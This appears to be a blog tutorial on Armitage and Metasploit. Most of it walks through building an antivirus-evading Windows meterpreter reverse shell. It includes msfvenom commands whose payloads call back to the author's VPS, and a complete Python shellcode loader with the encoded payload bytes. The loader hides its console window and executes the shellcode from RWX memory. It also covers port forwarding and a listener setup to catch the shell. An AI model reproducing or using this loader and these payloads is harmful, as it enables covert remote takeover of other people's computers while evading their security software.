Using Armitage

I've been meaning to try this for a while.

Using Armitage for the first time

Start PostgreSQL

```
service postgresql start
```

Switch to the postgres user

```
su postgres
```

Create a PostgreSQL database account:

```
createuser msf1 -P
```

You will be prompted for a password.

Create the database

The --owner parameter sets the owner of the database; the last argument is the database name.

```
createdb --owner=msf1 msf1
```

Start Metasploit

```
root@RcoIl:~# msfconsole
```

Connect to the database (the argument format is user:password@host/database):

```
msf > db_connect msf1:msf1@localhost/msf1
```

Start Armitage

Port forwarding

Forward the traffic arriving on port 8888 of the VPS to port 6665; the local machine then only needs to connect to port 6665 on the VPS.

Generating an AV-evading exe

```
root@RcoIl:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=8888 LHOST=139.199.xxx.xxx -e x86/shikata_ga_nai -i 11 -f py -o /root/rcoil.py
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 11 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai succeeded with size 522 (iteration=6)
x86/shikata_ga_nai succeeded with size 549 (iteration=7)
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai succeeded with size 630 (iteration=10)
x86/shikata_ga_nai chosen with final size 630
Payload size: 630 bytes
Final size of py file: 3020 bytes
Saved as: /root/rcoil.py
```

Rewrite the generated rcoil.py as follows.

```python
# Python 2 loader (the page's code, reindented and commented). The msfvenom
# "-f py" output is pasted in as `buf`; the script hides its console window,
# copies the bytes into RWX memory through the Win32 API and calls them.
from ctypes import *
import ctypes

buf = ""
buf += "\xda\xc2\xb8\x5a\xb8\x23\x52\xd9\x74\x24\xf4\x5b\x2b"
buf += "\xc9\xb1\x97\x31\x43\x1a\x83\xc3\x04\x03\x43\x16\xe2"
buf += "\xaf\x63\xfc\x8b\x3b\xb0\xf7\x94\x6d\xde\x62\x60\x2a"
buf += "\x36\x44\xd8\x5d\x79\x15\x0c\xde\x91\x65\x31\x0d\x10"
buf += "\xe1\x47\xe7\x77\xc0\x18\xf7\x11\x54\xc4\x1b\x10\x6f"
buf += "\xb3\xc4\xac\x3a\xc6\x0c\xf4\x4a\x39\x28\x85\x7f\xd7"
buf += "\xc6\x28\x9d\xae\x34\x11\x7b\x59\x26\xb3\xbf\xca\xf7"
buf += "\xa3\x77\x33\x9c\x9f\x29\x4b\xf9\xa7\x2f\x12\xfb\x2f"
buf += "\xea\x3f\x22\xa2\x42\x5b\xc5\xc5\xb8\xda\x28\x03\x3a"
buf += "\xf6\x3f\x8b\x43\x91\x73\x78\x38\x92\x99\x1b\x07\x2c"
buf += "\x77\xe7\xde\xf3\xc4\xf9\x10\xfd\xae\x88\x00\xf2\x79"
buf += "\xac\x2a\x07\x25\x96\xbd\x31\xe0\xff\xef\xc9\xc3\xea"
buf += "\x3b\xcc\x0a\x00\x27\x43\xa4\x60\x1f\x3c\x5b\xc4\xa0"
buf += "\x46\x65\xf1\xfc\x82\x8e\x10\x97\x1e\x05\x1e\x76\xae"
buf += "\xc7\xe3\xad\xe0\x09\x5a\x0a\x2a\x04\x9e\x71\x86\x23"
buf += "\xe0\x81\x63\x6f\x75\xca\xda\x24\x66\xbe\x4b\xb9\x3d"
buf += "\x98\x78\xfe\xd8\x3c\x3c\x87\x3d\x61\x48\xc7\xf4\x67"
buf += "\x59\x1e\x79\xf6\xf8\x71\xeb\x5a\xbb\x20\xb7\x2b\xd6"
buf += "\x26\xf6\x77\x6d\xd4\x33\x90\x42\x9c\xff\xef\x44\xb7"
buf += "\x1a\xec\x6a\xa6\x66\x6d\x1f\xaa\xdb\x84\x80\x68\xc4"
buf += "\x47\x96\xf4\x09\x15\xff\x0f\xff\xb9\x0c\x8e\x5c\xbe"
buf += "\x44\x93\xa4\x7c\xcd\x7f\x0c\x57\x24\xd4\x83\x89\xef"
buf += "\x03\x80\x79\xfd\x83\x33\x85\x76\x50\xa8\xae\x17\x03"
buf += "\x91\xc2\x66\x71\x72\x1e\x25\x35\x7d\xd7\x8b\x2c\xe5"
buf += "\x57\xc9\xce\xb2\xaa\xe3\xbb\x71\xb5\x23\x45\xa3\x90"
buf += "\xbb\xfb\xa0\x07\xaa\x1c\xf7\xd0\x34\x24\xa9\xb1\x8e"
buf += "\xbd\x7c\x52\xa8\xe1\x70\x25\xf4\x57\x90\x69\xf1\xfb"
buf += "\xc2\x44\xac\xa9\xb4\x6d\x84\xfb\x05\x7d\x3b\xfb\x70"
buf += "\xa0\x03\x90\xe5\xcf\x77\x3e\xb9\x39\x44\x1e\xa1\x8d"
buf += "\x55\x44\x3a\xf7\x8e\xe4\x35\x64\xd7\x63\xcb\xc3\x3d"
buf += "\x48\xb3\xaa\x67\xe3\x17\xc1\xaa\x4c\x62\x6a\x4e\xfb"
buf += "\x2e\x16\x70\xa3\xc9\x70\xfa\x0e\x7e\xea\xc3\xf3\x9b"
buf += "\x9a\xed\x9a\xbe\xcd\x32\xc6\x66\x80\xb0\x92\x20\x55"
buf += "\x58\x1e\x5b\xbf\x7f\x54\x7d\x64\xe3\x9b\x81\xd3\x25"
buf += "\x65\x2c\x42\xd0\xc3\x07\x5f\xa3\x12\x75\x5a\xcf\x52"
buf += "\x62\xf2\xa8\xe0\xcf\x93\x2f\x1b\xb6\x2c\x18\x0e\x0e"
buf += "\x42\xaa\xd8\x3b\x01\x1b\x7d\x04\x78\x42\x10\x40\x83"
buf += "\xce\xf2\xb4\x2b\x42\xd9\xf6\x84\xa7\xd4\xb3\x2d\x78"
buf += "\xb0\x18\xa0\x9c\xfa\x23\xd1\xd7\x65\x36\xf4\x26\xaa"
buf += "\x5e\x29\xb8\xdc\x0e\x84\xef\xc0\x71\xbf\xce\x24\xb0"
buf += "\x10\x03\x95\x90\x03\x58\xde\x52\x6f\x37\xc4\x5c\xe7"
buf += "\x43\x27\x0a\xa7\xa5\x20\xa5\xab\x73\x70\x03\x48\xab"
buf += "\x8c\x67\x09\xbc\xec\xd4\x04\x70\xe9\xda\x9e\xe2\xb9"
buf += "\xac\xa3\xd6\x65\xd2\xec\x52\x4c\xbe\x8e\x0d\x27\xa1"
buf += "\x67\xc2\x9c\x34\x71\xf3\x0c\x7e\xec\x6c\x4f\x98\xb9"
buf += "\xe7\x1c\x24\x2e\x68\xc8\x59\xa2\xdc\x7f\xeb\x41\x19"
buf += "\x4e\x61\x1e\x9f\xd7\xfb\xb7\x3a\xf0\xbb\xb4\x33\xcf"
buf += "\xf9\xb2\xa1\xe9\x67\x0f\x4c\x88\x7d\xc5\x90\x74\xf2"
buf += "\x5a\xd4\x25\xca\xaa\x63"

# Unused Linux variant: libc is never loaded (the CDLL line stays commented
# out), so calling executable_code() would raise NameError. The script never
# calls it.
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4

def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr:
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr

VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)

# Hide the console window. The `if 666==666` guard is always true and only
# pads the script; CloseHandle() on a window handle (HWND) does nothing useful.
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    if 666==666:
        ctypes.windll.user32.ShowWindow(whnd, 0)
        ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666

# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                                      ctypes.c_int(len(shellcode)),
                                                      ctypes.c_int(0x3000),
                                                      ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
# Treat the RWX buffer as a function with no arguments and call into it.
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
print "Code By Luan"
shell()
```

The evasion technique comes from Luan.
Then compile it into an exe.

Alternatively, generate the exe directly, but then the evasion is much poorer:

```
root@RcoIl:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=139.199.xxx.xxx LPORT=8888 -f exe > /root/test.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
```

Connecting the intranet msf to the VPS

Select: Armitage -> Listeners -> Bind

Enter the VPS IP as HOST, 6665 as PORT, and choose meterpreter as the shell type.
As the screenshot shows, the connection has been established.

Test results
